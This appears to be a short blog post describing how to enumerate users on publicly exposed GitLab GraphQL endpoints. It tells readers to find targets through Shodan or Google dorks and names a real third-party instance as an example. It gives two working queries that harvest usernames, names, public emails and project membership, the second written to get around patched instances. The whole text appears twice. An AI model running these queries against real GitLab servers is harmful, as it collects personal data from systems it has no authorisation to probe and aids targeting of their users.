.png?dateline=1674824144){kind=avatar}
Wednesday 19 | 11:01:AM
Some GitLab instances have a public GraphQL endpoint, giving the possibility to enumerate users among other things.
There is not much to add, it's simple; you can use Shodan or Google Dorks to find GitLab instances, then change the path to /-/graphql-explorer (e.g, https://target/-/graphql-explorer, https://git.fpfis.eu/-/graphql-explorer).
Query examples:
Simple
{
users {
nodes {
id
username
name
publicEmail
}
}
}
You may stumble on patched instances, like I did while I was writing this; I could not retrieve the users using the first query, so I got creative.
{
projects {
edges {
node {
id
name
description
createdAt
projectMembers {
nodes {
user {
id
username
name
publicEmail
webUrl
status {
message
}
}
}
}
ciConfigPathOrDefault
}
}
}
}
There is not much to add, it's simple; you can use Shodan or Google Dorks to find GitLab instances, then change the path to /-/graphql-explorer (e.g, https://target/-/graphql-explorer, https://git.fpfis.eu/-/graphql-explorer).
Query examples:
Simple
{
users {
nodes {
id
username
name
publicEmail
}
}
}
You may stumble on patched instances, like I did while I was writing this; I could not retrieve the users using the first query, so I got creative.
{
projects {
edges {
node {
id
name
description
createdAt
projectMembers {
nodes {
user {
id
username
name
publicEmail
webUrl
status {
message
}
}
}
}
ciConfigPathOrDefault
}
}
}
}